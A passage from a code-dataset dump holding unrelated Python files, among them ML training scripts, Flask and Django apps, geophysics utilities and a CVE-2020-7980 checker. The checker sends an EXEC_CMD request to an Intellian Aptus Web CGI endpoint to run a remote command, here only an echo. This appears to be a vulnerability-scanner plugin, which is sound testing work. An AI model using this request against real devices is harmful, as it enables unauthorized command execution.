str(res[\"res\"][\"uid\"])\n","sub_path":"src/python/grapl_analyzerlib/grapl_analyzerlib/view_from_proto.py","file_name":"view_from_proto.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"209729832","text":"from ics_hdu_backend.models import Conference\n\nclass ConferenceSave(object):\n\tdef __init__(self,request):\n\t\t\n\t\tself.session = request.POST['session']\n\t\tself.conference_topic = request.POST['conference_topic']\n\t\tself.conference_start_time = request.POST['conference_start_time']\n\t\tself.conference_end_time = request.POST['conference_end_time']\n\t\tself.conference_locations = request.POST['conference_locations']\n\n\tdef saveconference(self):\n\t\t'''\n\t\t存储数据\n\t\t'''\n\t\tconference = Conference()\n\t\tconference.session = self.session\n\t\tconference.conference_topic = self.conference_topic\n\t\tconference.conference_start_time = self.conference_start_time\n\t\tconference.conference_end_time = self.conference_end_time\n\t\tconference.conference_locations = self.conference_locations\n\t\tconference.save()","sub_path":"ics_hdu_backend/service/conference_service.py","file_name":"conference_service.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"513296175","text":"# 2019/04/16\n# def RadarMLTConv():\n\nimport aacgmv2\nimport apexpy\n\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom itertools import compress\n\nimport numpy as np\n\n\nclass RadarMLTConv(object):\n\n def __init__(self,\n radar='ESR',\n coordSys='AACGM_v2',\n apexRefHeight_km=130,\n apexRefTime=None):\n\n self.coordSys = coordSys\n\n if self.coordSys.upper() == 'APEX':\n\n if apexRefTime == None:\n apexRefTime = datetime.datetime(2015, 1, 1)\n\n self.apexRefHeight_km = apexRefHeight_km\n self.apexRefTime = apexRefTime\n print(\"Apex ref height, date initialized to {:5d} km, {:s}\".format(\n self.apexRefHeight_km, self.apexRefTime.strftime(\"%Y-%m-%d\")))\n self.apex = apexpy.Apex(\n self.apexRefTime, refh=self.apexRefHeight_km)\n\n if radar == 'ESR':\n self.gdlat = 78.15 # deg N (Geodetic: measured by GPS)\n self.gdlon = 16.02 # deg E (Geodetic: measured by GPS)\n self.gdalt = 0.445 # km (Geodetic: measured by GPS)\n elif radar == 'TromsUHF':\n self.gdlat = 69.583\n self.gdlon = 19.23\n self.gdaltitude = 0.086\n\n self.radar = radar\n\n def __call__(self, dtime, *args):\n\n self.dtime = dtime\n\n if len(args) > 0:\n assert len(args) == 3, \"Must provide new gdlat, gdalt, gdlon!\"\n\n # print(args[0],args[1],args[2])\n self.gdlat = args[0]\n self.gdalt = args[1]\n self.gdlon = args[2]\n\n nNeeded = np.max(\n [self.gdlat.size, self.gdlon.size, self.gdalt.size, len(self.dtime)])\n\n assert (len(self.dtime) == nNeeded) & (self.gdlat.size == nNeeded) & (\n self.gdlon.size == nNeeded) & (self.gdalt.size == nNeeded), \"Må være samme størrelse!\"\n\n ##############################\n # OLD WAY\n ##############################\n # mlatCGMs = []\n # mlonCGMs = []\n # mltCGMs = []\n\n # print(\"i\",\"time\",\"lat\",\"lon\",\"alt\")\n # for i, dter in enumerate(self.dtime):\n # # print(i,dter,self.gdlat[i],self.gdlon[i],self.gdalt[i])\n\n # mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat[i],\n # self.gdlon[i],\n # self.gdalt[i],\n # dter)\n\n # mlatCGMs.append(mlatCGM)\n # mlonCGMs.append(mlonCGM)\n # mltCGMs.append(mltCGM)\n\n # return np.vstack((np.array(mlatCGMs), np.array(mlonCGMs), np.array(mltCGMs)))\n\n mlats = []\n mlons = []\n mlts = []\n tmpTimes = self.dtime\n tmpgdlats = self.gdlat\n tmpgdlons = self.gdlon\n tmpgdalts = self.gdalt\n # print(\"NTimes: \", len(tmpTimes))\n for i, dter in enumerate(tmpTimes):\n # print(i,dter,self.gdlat[i],self.gdlon[i],self.gdalt[i])\n\n # This is a way slow option for Apex coords\n self.dtime = dter\n self.gdlat = tmpgdlats[i]\n self.gdlon = tmpgdlons[i]\n self.gdalt = tmpgdalts[i]\n # print(\"{:4d} : {:s}\".format(\n # i, self.dtime.strftime(\"%Y-%m-%d\")))\n mlat, mlon, mlt = self.__getSingleCoordTuple()\n\n mlats.append(mlat)\n mlons.append(mlon)\n mlts.append(mlt)\n\n return np.vstack((np.array(mlats), np.array(mlons), np.array(mlts)))\n\n else:\n if hasattr(self.dtime, '__len__'):\n\n # mlatCGMs = []\n # mlonCGMs = []\n # mltCGMs = []\n\n # # for i,dter in enumerate(self.dtime):\n # for dter in self.dtime:\n # mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat,\n # self.gdlon,\n # self.gdalt,\n # dter)\n\n # mlatCGMs.append(mlatCGM)\n # mlonCGMs.append(mlonCGM)\n # mltCGMs.append(mltCGM)\n\n # return np.vstack((np.array(mlatCGMs), np.array(mlonCGMs), np.array(mltCGMs)))\n\n mlats, mlons, mlts = self.__getSingleCoordMultiTimeTuple()\n\n return np.vstack((np.array(mlats), np.array(mlons), np.array(mlts)))\n\n else:\n\n # mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat,\n # self.gdlon,\n # self.gdalt,\n # self.dtime)\n # return np.vstack((mlatCGM, mlonCGM, mltCGM))\n mlat, mlon, mlt = self.__getSingleCoordTuple()\n return np.vstack((mlat, mlon, mlt))\n\n def update_Apex_time(self, apexRefTime):\n\n if self.coordSys.upper() == 'APEX':\n\n assert isinstance(\n apexRefTime, datetime.date), \"Must provide a datetime!\"\n\n self.apexRefTime = apexRefTime\n\n print(\"Apex ref date reinitialized to {:s}\".format(\n self.apexRefTime.strftime(\"%Y-%m-%d\")))\n self.apex = apexpy.Apex(\n self.apexRefTime, refh=self.apexRefHeight_km)\n else:\n print(\"N/A; self.coordSys is {:s}\".format(self.coordSys))\n\n def __getSingleCoordTuple(self):\n\n if self.coordSys.upper() == 'AACGM_V2':\n\n mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat,\n self.gdlon,\n self.gdalt,\n self.dtime)\n\n return mlatCGM, mlonCGM, mltCGM\n\n elif self.coordSys.upper() == 'APEX':\n\n if not hasattr(self, 'apex'):\n\n self.apexRefTime = self.dtime\n\n if not hasattr(self, 'apexRefHeight_km'):\n self.apexRefHeight_km = 130\n\n print(\"Apex ref height, time initialized to {:5d}, {:s}\".format(\n self.apexRefHeight_km, self.apexRefTime.strftime(\"%Y-%m-%d\")))\n\n self.apex = apexpy.Apex(self.dtime, refh=self.apexRefHeight_km)\n\n mlatApex, mlonApex = self.apex.geo2apex(\n self.gdlat, self.gdlon, self.gdalt)\n\n mltApex = self.apex.mlon2mlt(mlonApex, self.dtime)\n\n return mlatApex, mlonApex, mltApex\n\n def __getSingleCoordMultiTimeTuple(self):\n\n if self.coordSys.upper() == 'AACGM_V2':\n\n mlatCGMs = []\n mlonCGMs = []\n mltCGMs = []\n\n # for i,dter in enumerate(self.dtime):\n for dter in self.dtime:\n mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat,\n self.gdlon,\n self.gdalt,\n dter)\n\n mlatCGMs.append(mlatCGM)\n mlonCGMs.append(mlonCGM)\n mltCGMs.append(mltCGM)\n\n return mlatCGMs, mlonCGMs, mltCGMs\n\n elif self.coordSys.upper() == 'APEX':\n\n if not hasattr(self, 'apex'):\n\n self.apexRefTime = min(self.dtime)\n\n if not hasattr(self, 'apexRefHeight_km'):\n selfa.apexRefHeight_km = 130\n\n print(\"Apex ref height, time initialized to {:5d}, {:s}\".format(\n self.apexRefHeight_km, self.apexRefTime.strftime(\"%Y-%m-%d\")))\n\n self.apex = apexpy.Apex(\n self.apexRefTime, refh=self.apexRefHeight_km)\n\n # First get zese\n mlatApex, mlonApex = self.apex.geo2apex(\n self.gdlat, self.gdlon, self.gdalt)\n\n # Need num måneder\n relDel = relativedelta(max(self.dtime), min(self.dtime))\n add1 = int((relDel.days > 0) or (relDel.weeks > 0))\n nMaaneder = relDel.years*12 + relDel.months + add1\n\n mltsApex = []\n if nMaaneder == 0:\n\n for dter in self.dtime:\n mltApex = self.apex.mlon2mlt(mlonApex, dter)\n mltsApex.append(mltApex)\n\n else:\n\n t1 = min(self.dtime)\n for i in range(nMaaneder):\n startMaaned = t1 + relativedelta(months=i)\n stopMaaned = t1 + relativedelta(months=i+1)\n filt = [((tid >= startMaaned) and (tid <= stopMaaned))\n for tid in self.dtime]\n if np.where(np.array(filt))[0].size == 0:\n continue\n\n self.apex.set_epoch(startMaaned)\n\n tmpTimes = list(compress(self.dtime, filt))\n\n for dter in tmpTimes:\n mltApex = self.apex.mlon2mlt(mlonApex, dter)\n mltsApex.append(mltApex)\n\n mltsApex = np.array(mltsApex)\n mlatsApex = np.replicate(mlatApex, mltsApex.size)\n mlonsApex = np.replicate(mlonApex, mltsApex.size)\n\n return mlatsApex, mlonsApex, mltsApex\n","sub_path":"journals/CEDAR_Madrigal/RadarMLTConv.py","file_name":"RadarMLTConv.py","file_ext":"py","file_size_in_byte":9802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"331220192","text":"import os\nimport csv\n\n\nclass CloUpdateHandler:\n \"\"\"\n Class used for handling new received CLOs and updating or recreating CSV file\n containing CLO data.\n \"\"\"\n @staticmethod\n def extract_received_and_stored_dict(clos, csv_file_path):\n \"\"\"\n Extract two dictionaries (received and stored post offices)\n \"\"\"\n stored_clos_uuid_map = {}\n\n # Create map of received CLO UUIDs with content (latitude, longitude, address)\n received_clos_uuid_map = {}\n for json_obj in clos:\n uuid = json_obj[\"uuid\"]\n received_clos_uuid_map[uuid] = json_obj\n\n if not os.path.isfile(csv_file_path):\n print(\"Postal offices csv file does not exist yet.\")\n else:\n # Open file and read line by line\n stored_clos_uuid_map = {}\n with open(csv_file_path, encoding=\"utf8\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n\n for row in csv_reader:\n # Get all important values - UUID, address, latitude and longitude\n address = row[0]\n uuid = row[1]\n lat = row[2]\n lon = row[3]\n\n # Map of stored CLOs\n stored_clos_uuid_map[uuid] = {\n \"uuid\": uuid,\n \"lat\": lat,\n \"lon\": lon,\n \"address\": address\n }\n csv_file.close()\n\n return received_clos_uuid_map, stored_clos_uuid_map\n\n @staticmethod\n def handle_new_clo_request(clos, csv_file_path):\n\n \"\"\"\n Handle request for new CLOs. If any of received post offices is not stored in our file from which graph is\n built, we will rewrite the file and rebuild the graph.\n :param clos:\n :param csv_file_path:\n :return:\n\n Example request (field clos):\n {\n \"CLOS\": [\n {\n \"uuid\": \"1212\",\n \"lat\": \"14.12222\",\n \"lon\": \"47.41243124\",\n \"address\": \"Test road\"\n },\n {\n \"uuid\": \"1214\",\n \"lat\": \"14.5235235\",\n \"lon\": \"46.521424\",\n \"address\": \"Hoolywood road\"\n }\n ]\n }\n \"\"\"\n received_clos_uuid_map, stored_clos_uuid_map = CloUpdateHandler.extract_received_and_stored_dict(clos,\n csv_file_path)\n build_new_graph = False\n\n if len(received_clos_uuid_map) != len(stored_clos_uuid_map):\n build_new_graph = True\n\n else:\n # Go through received CLOs and check if we do not have all of them stored\n for received_key in received_clos_uuid_map.keys():\n received_object = received_clos_uuid_map[received_key]\n\n # Check if there is difference in uuids\n if received_key not in stored_clos_uuid_map.keys():\n #stored_clos_uuid_map.append()\n build_new_graph = True\n break\n #check is there is difference in other values\n else:\n stored_object = stored_clos_uuid_map[received_key]\n # Something is different, update this entry\n if stored_object[\"lat\"] != received_object[\"lat\"] or stored_object[\"lon\"] != \\\n received_object[\"lon\"] or stored_object[\"address\"] != received_object[\"address\"]:\n build_new_graph = True\n break\n\n if build_new_graph:\n with open(csv_file_path, 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n\n for json_obj in clos:\n csv_writer.writerow([json_obj[\"address\"], json_obj[\"uuid\"], json_obj[\"lat\"], json_obj[\"lon\"]])\n csv_file.close()\n\n return build_new_graph\n\n @staticmethod\n def handle_update_clo_request(clos, csv_file_path):\n \"\"\"\n Method used for detecting which CLO's changed and how.\n :param clos:\n :param csv_file_path:\n :return:\n\n Example request (field clos):\n {\n \"CLOS\": [\n {\n \"uuid\": \"1212\",\n \"lat\": \"14.12224442\",\n \"lon\": \"47.41243121445\",\n \"address\": \"Miami, Florida\",\n \"action\": \"update\"\n },\n {\n \"uuid\": \"1214\",\n \"lat\": \"14.5235235\",\n \"lon\": \"46.521424\",\n \"address\": \"Hoolywood road\",\n \"action\": \"remove\"\n }\n ]\n }\n \"\"\"\n received_clos_uuid_map, stored_clos_uuid_map = CloUpdateHandler.extract_received_and_stored_dict(clos, csv_file_path)\n build_new_graph = False\n clos_to_add_dict = {}\n\n # Go through received CLOs and check if we do not have all of them stored\n for received_key in received_clos_uuid_map.keys():\n received_object = received_clos_uuid_map[received_key]\n if \"action\" not in received_object:\n received_object[\"action\"] = None\n action = received_object[\"action\"]\n received_object.pop(\"action\", None)\n\n if received_key not in stored_clos_uuid_map.keys():\n if action is None or action == \"add\" or action == \"update\":\n print(\"received object\", received_object)\n\n clos_to_add_dict[received_key] = received_object\n build_new_graph = True # At least one CLO needs to be added or updated\n else:\n # We have stored entry for this key\n stored_object = stored_clos_uuid_map[received_key]\n\n # If \"remove\", just continue with for loop\n if action == \"remove\":\n build_new_graph = True\n continue\n elif stored_object[\"lat\"] != received_object[\"lat\"] or stored_object[\"lon\"] != \\\n received_object[\"lon\"] or stored_object[\"address\"] != received_object[\"address\"]:\n build_new_graph = True\n\n # Just add already stored object\n clos_to_add_dict[received_key] = stored_object\n\n if build_new_graph:\n with open(csv_file_path, 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n\n for key in clos_to_add_dict.keys():\n obj = clos_to_add_dict[key]\n csv_writer.writerow([obj[\"address\"], obj[\"uuid\"], obj[\"lat\"], obj[\"lon\"]])\n csv_file.close()\n\n return build_new_graph\n","sub_path":"src/modules/utils/clo_update_handler.py","file_name":"clo_update_handler.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"61341717","text":"import numpy as np\nfrom GaitAnaylsisToolkit.LearningTools.Trainer import GMMTrainer\nfrom GaitAnaylsisToolkit.Session import ViconGaitingTrial\nfrom GaitAnaylsisToolkit.LearningTools.Runner import GMMRunner\nfrom GaitCore.Core import Point\nimport matplotlib.pyplot as plt\nfrom dtw import dtw\nimport numpy.polynomial.polynomial as poly\n\n\ndef make_toe(files, hills, sides):\n\n pathsZ = []\n pathsY = []\n pathsX = []\n\n for hill, file, side in zip(hills, files, sides):\n\n trial = ViconGaitingTrial.ViconGaitingTrial(vicon_file=file)\n marker = trial.vicon.get_markers()\n if side == \"L\":\n toe = marker.get_marker(\"LTOE\")\n else:\n toe = marker.get_marker(\"RTOE\")\n\n jointZ = []\n jointY = []\n jointX = []\n\n for t in toe:\n jointZ.append(t.z)\n jointY.append(t.y)\n jointX.append(t.x)\n\n pathsZ.append(np.array([jointZ[h[0]] for h in hill]))\n pathsY.append(np.array([jointY[h[0]] for h in hill]))\n pathsX.append(np.array([jointX[h[0]] for h in hill]))\n\n return pathsZ, pathsY, pathsX\n\n\ndef get_index(frames, files, side):\n\n paths = []\n for file in files:\n trial = ViconGaitingTrial.ViconGaitingTrial(vicon_file=file)\n markers = trial.vicon.get_markers()\n markers.smart_sort()\n markers.auto_make_transform(frames)\n if side == \"L\":\n hills = trial.get_stairs(\"LTOE\", \"stairA\")\n else:\n hills = trial.get_stairs(\"RTOE\", \"stairA\")\n\n paths.append(hills[0])\n\n return paths","sub_path":"utilities/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"598415431","text":"'''\n@Author: hua\n@Date: 2019-06-17 14:14:28\n@description: \n@LastEditors: hua\n@LastEditTime: 2019-08-28 14:06:13\n'''\nfrom gevent import monkey\nmonkey.patch_all(select=True, socket=True)\nfrom app import app, socketio\n# https://www.cnblogs.com/franknihao/p/7202253.html uwsgi配置\napp = app\nif __name__ == '__main__':\n app.debug = False\n socketio.run(app, host='0.0.0.0', port=501)\n ","sub_path":"chatApi/socketRun.py","file_name":"socketRun.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498419287","text":"import shutil\nimport os\nimport matplotlib.pyplot as plt\n\ntrain_set_base_dir = 'I:\\Projects\\TensorFlow\\GTSRB_img_Crop\\Final_Training\\Images'\nvalidation_set_base_dir = 'I:\\Projects\\TensorFlow\\GTSRB_img_Crop\\Final_Validation\\Images'\n\n# start image preprocess\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255\n)\ntrain_data_generator = train_datagen.flow_from_directory(\n directory=train_set_base_dir,\n target_size=(48, 48),\n batch_size=32,\n class_mode='categorical')\n\n\nvalidation_datagen = ImageDataGenerator(\n rescale=1. /255\n)\n\nvalidation_data_generator = validation_datagen.flow_from_directory(\n directory=validation_set_base_dir,\n target_size=(48, 48),\n batch_size=32,\n class_mode='categorical'\n)\n\n# define a simple CNN network\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPool2D, Flatten, Dense, Dropout\n\nmodel = Sequential()\n\n# add Con2D layers\nmodel.add(Conv2D(filters=32, kernel_size=(3, 3), activation='relu', input_shape=(48, 48, 3)))\nmodel.add(MaxPool2D(pool_size=(2, 2), padding='valid'))\n\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2), padding='valid'))\n\nmodel.add(Conv2D(filters=128, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2), padding='valid'))\n\nmodel.add(Conv2D(filters=128, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2), padding='valid'))\n\n# flatten\nmodel.add(Flatten())\n\n# dropOut layer\nmodel.add(Dropout(0.2))\n\n# add one simple layer for classification\nmodel.add(Dense(units=512, activation='relu'))\n\n# add output layer\nmodel.add(Dense(units=43, activation='softmax'))\n\n# compile model\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])\n\n# print model info\nmodel.summary()\njson_str = model.to_json()\nprint(json_str)\n# fit_generator to fill in the dataset\nhistory = model.fit_generator(\n generator=train_data_generator,\n steps_per_epoch=100,\n epochs=30,\n validation_data=validation_data_generator,\n validation_steps=50)\n\n# train done, save the models\nmodel.save('I:\\Projects\\TensorFlow/traffic_signs.h5')\n\n# plot the roc curve\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(1, len(acc) + 1)\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.figure()\n\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\n\nplt.show()\n","sub_path":"dateset_process/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"493287209","text":"from urllib.request import urlretrieve\nimport os\nfrom gzip import GzipFile\nfrom time import time\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score\nfrom joblib import Memory\nfrom pygbm import GradientBoostingMachine\n# from lightgbm import LGBMClassifier\n# for now as pygbm does not have classifier loss yet:\nfrom lightgbm import LGBMRegressor\nimport numba\n\n\nHERE = os.path.dirname(__file__)\nURL = (\"https://archive.ics.uci.edu/ml/machine-learning-databases/00280/\"\n \"HIGGS.csv.gz\")\nm = Memory(location='/tmp', mmap_mode='r')\nn_leaf_nodes = 31\nn_trees = 10\nsubsample = None\nlr = 1.\nmax_bins = 255\n\n\n@m.cache\ndef load_data():\n filename = os.path.join(HERE, URL.rsplit('/', 1)[-1])\n if not os.path.exists(filename):\n print(f\"Downloading {URL} to {filename} (2.6 GB)...\")\n urlretrieve(URL, filename)\n print(\"done.\")\n\n print(f\"Parsing {filename}...\")\n tic = time()\n with GzipFile(filename) as f:\n df = pd.read_csv(f, header=None, dtype=np.float32)\n toc = time()\n print(f\"Loaded {df.values.nbytes / 1e9:0.3f} GB in {toc - tic:0.3f}s\")\n return df\n\n\ndf = load_data()\ntarget = df.values[:, 0]\ndata = np.ascontiguousarray(df.values[:, 1:])\ndata_train, data_test, target_train, target_test = train_test_split(\n data, target, test_size=50000, random_state=0)\n\nif subsample is not None:\n data_train, target_train = data_train[:subsample], target_train[:subsample]\n\nn_samples, n_features = data_train.shape\nprint(f\"Training set with {n_samples} records with {n_features} features.\")\n\nprint(\"Fitting a LightGBM model...\")\ntic = time()\nlightgbm_model = LGBMRegressor(n_estimators=n_trees, num_leaves=n_leaf_nodes,\n learning_rate=lr, verbose=10)\nlightgbm_model.fit(data_train, target_train)\ntoc = time()\npredicted_test = lightgbm_model.predict(data_test)\nroc_auc = roc_auc_score(target_test, predicted_test)\nprint(f\"done in {toc - tic:.3f}s, ROC AUC: {roc_auc:.4f}\")\n\n# model_string = lightgbm_model._Booster._save_model_to_string()\n# in_tree = False\n# for line in model_string.split('\\n'):\n# if line.startswith('Tree'):\n# in_tree = True\n# if in_tree and line == '':\n# in_tree = False\n# print()\n# if in_tree:\n# print(line)\n\nprint(\"JIT compiling code for the pygbm model...\")\ntic = time()\npygbm_model = GradientBoostingMachine(learning_rate=lr, max_iter=1,\n max_bins=max_bins,\n max_leaf_nodes=n_leaf_nodes,\n random_state=0, scoring=None,\n verbose=0, validation_split=None)\npygbm_model.fit(data_train[:100], target_train[:100])\ntoc = time()\nprint(f\"done in {toc - tic:.3f}s\")\n\n\nprint(\"Fitting a pygbm model...\")\ntic = time()\npygbm_model = GradientBoostingMachine(learning_rate=lr, max_iter=n_trees,\n max_bins=max_bins,\n max_leaf_nodes=n_leaf_nodes,\n random_state=0, scoring=None,\n verbose=1, validation_split=None)\npygbm_model.fit(data_train, target_train)\ntoc = time()\npredicted_test = pygbm_model.predict(data_test)\nroc_auc = roc_auc_score(target_test, predicted_test)\nprint(f\"done in {toc - tic:.3f}s, ROC AUC: {roc_auc:.4f}\")\n\n# for predictor in pygbm_model.predictors_:\n# print(predictor.nodes)\n\n\nif hasattr(numba, 'threading_layer'):\n print(\"Threading layer chosen: %s\" % numba.threading_layer())\n","sub_path":"benchmarks/bench_higgs_boson.py","file_name":"bench_higgs_boson.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"238376223","text":"from django.db import models\n\n# Create your models here.\n\nclass Settings(models.Model):\n class Meta:\n app_label = 'core'\n verbose_name = \"Настройки сервиса\"\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.title\n\n settings_id = models.SlugField(max_length=50, default='unknown', unique=True)\n settings_id.verbose_name = \"Уникальный ID конфигурации\"\n settings_id.help_text = \"Используется для кастомизации отдельных сервисов\"\n\n title = models.CharField(default='Сервис печати', max_length=255)\n title.verbose_name = \"Title проекта\"\n title.help_text = \"\"\n\n title_navbar = models.CharField(default='Сервис печати', max_length=255)\n title_navbar.verbose_name = \"Title проекта для навигационной панели\"\n title_navbar.help_text = \"\"\n\n company_name = models.CharField(default='2016 ФОПФ МФТИ', max_length=255)\n company_name.verbose_name = \"Credits\"\n company_name.help_text = \"Credits для каждой страницы проекта\"\n\n","sub_path":"src/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"89078385","text":"#!/usr/bin/env python3\n\n'''\nname: CVE-2020-7980漏洞\ndescription: CVE-2020-7980漏洞可执行任意命令\n'''\n\nimport time\nimport calendar\nfrom app.lib.utils.common import get_capta\nfrom app.lib.utils.request import request\n\nclass CVE_2020_7980_BaseVerify:\n def __init__(self, url):\n self.url = url\n self.capta = get_capta()\n self.data = {\n \"O_\":\"A\",\n \"V_\":1,\n \"S_\":123456789,\n \"F_\":\"EXEC_CMD\",\n \"P1_\":{\n \"F\":\"EXEC_CMD\",\n \"Q\":'echo %s' % (self.capta)\n }\n }\n\n def run(self):\n try:\n if not self.url.startswith(\"http\") and not self.url.startswith(\"https\"):\n self.url = \"http://\" + self.url\n cmd_request = request.post(self.url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json = self.data, cookies = {'ctr_t': '0', 'sid': '123456789'})\n if cmd_request.status_code == 200 and self.capta in cmd_request.text:\n result = cmd_request.text.split()[-2].replace('},', '')\n print(\"存在CVE-2020-7980漏洞,执行结果为:\", result)\n return True\n else:\n print(\"不存在CVE-2020-7980漏洞\")\n return False\n except Exception as e:\n print(e)\n return False\n finally:\n pass\n\nif __name__ == '__main__':\n CVE_2020_7980 = CVE_2020_7980_BaseVerify('http://127.0.0.1')\n CVE_2020_7980.run()","sub_path":"python/app/plugins/http/Intellian Aptus Web/CVE_2020_7980.py","file_name":"CVE_2020_7980.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"122095257","text":"import os\nfrom functools import wraps\n\nfrom flask import (Flask, redirect, request, render_template, url_for, session)\nfrom flask_pymongo import PyMongo\n\n\napp = Flask(__name__)\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n# connect app as mongodb client\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\n# 'main' database is exposed as mongo.db\nmongo = PyMongo(app)\n\ndebugging = \"DEBUG\" in os.environ\n\n\ndef requires_user(func):\n \"\"\"\n Redirects wrapped route to user definition if no user in session.\n \"\"\"\n @wraps(func)\n def route(*args, **kwargs):\n if session.get(\"user\") is None:\n # Display flash message?\n return redirect(url_for(\"user\"))\n else:\n return func(*args, **kwargs)\n\n return route\n\n\n@app.route(\"/\")\n@requires_user\ndef home():\n \"\"\"\n Shows the home page/default route and main app page\n Loads all provisions from mongodb collection\n \"\"\"\n\n # Performs an join like query to get all values of ws_considerations with\n # Corrosponding provisions attached\n considerations = list(mongo.db.ws_considerations.aggregate([\n {\n \"$lookup\" : {\n \"from\" : \"provisions\",\n \"localField\" : \"_id\",\n \"foreignField\" : \"ws_consideration\",\n \"as\" : \"provisions\"\n }\n }\n ]))\n\n return render_template(\n \"index.html\",\n page_title=\"Home\",\n considerations=considerations\n )\n\n\n@app.route('/about')\ndef about():\n \"\"\"\n About Page\n \"\"\"\n return render_template(\"about.html\", page_title=\"About\")\n\n\n@app.route('/faq')\ndef faq():\n \"\"\"\n FAQ Page\n \"\"\"\n return render_template(\"faq.html\", page_title=\"FAQ\")\n\n\n@app.route(\"/user\", methods=[\"GET\", \"POST\"])\ndef user():\n \"\"\"\n User log in page\n Landing page for users not in session\n \"\"\"\n if request.method == 'POST':\n # Ensure firstname provided, but allow lastname to be blank.\n # We don't want to discriminate against Madonna\n if \"firstname\" in request.form and request.form[\"firstname\"]:\n session[\"user\"] = {\n \"firstname\": request.form[\"firstname\"],\n \"lastname\": None\n }\n if \"lastname\" in request.form:\n session[\"user\"][\"lastname\"] = request.form[\"lastname\"]\n\n return redirect(url_for(\"home\"))\n\n return render_template(\"user.html\", page_title=\"Welcome\")\n\n\n@app.route(\"/submit\", methods=[\"GET\", \"POST\"])\n@requires_user\ndef submit():\n \"\"\"\n Submits the user's selections\n \"\"\"\n return \"

Submit success goes here

\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=debugging)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"128004055","text":"from scripts.波动率计算 import *\n\ndf1 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"113009广汽转债\").fillna(method='ffill')\ndf2 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"113021中信转债\").fillna(method='ffill')\ndf = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"110053苏银转债\").fillna(method='ffill')\n\ndf3 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"127012招路转债\").fillna(method='ffill')\ndf4 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"113011光大转债\").fillna(method='ffill')\ndf5 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"113013国君转债\").fillna(method='ffill')\ndf6 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", sheet_name=\"110046圆通转债\").fillna(method='ffill')\ndf7 = pd.read_excel(\"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\转债分钟行情数据.xlsx\", 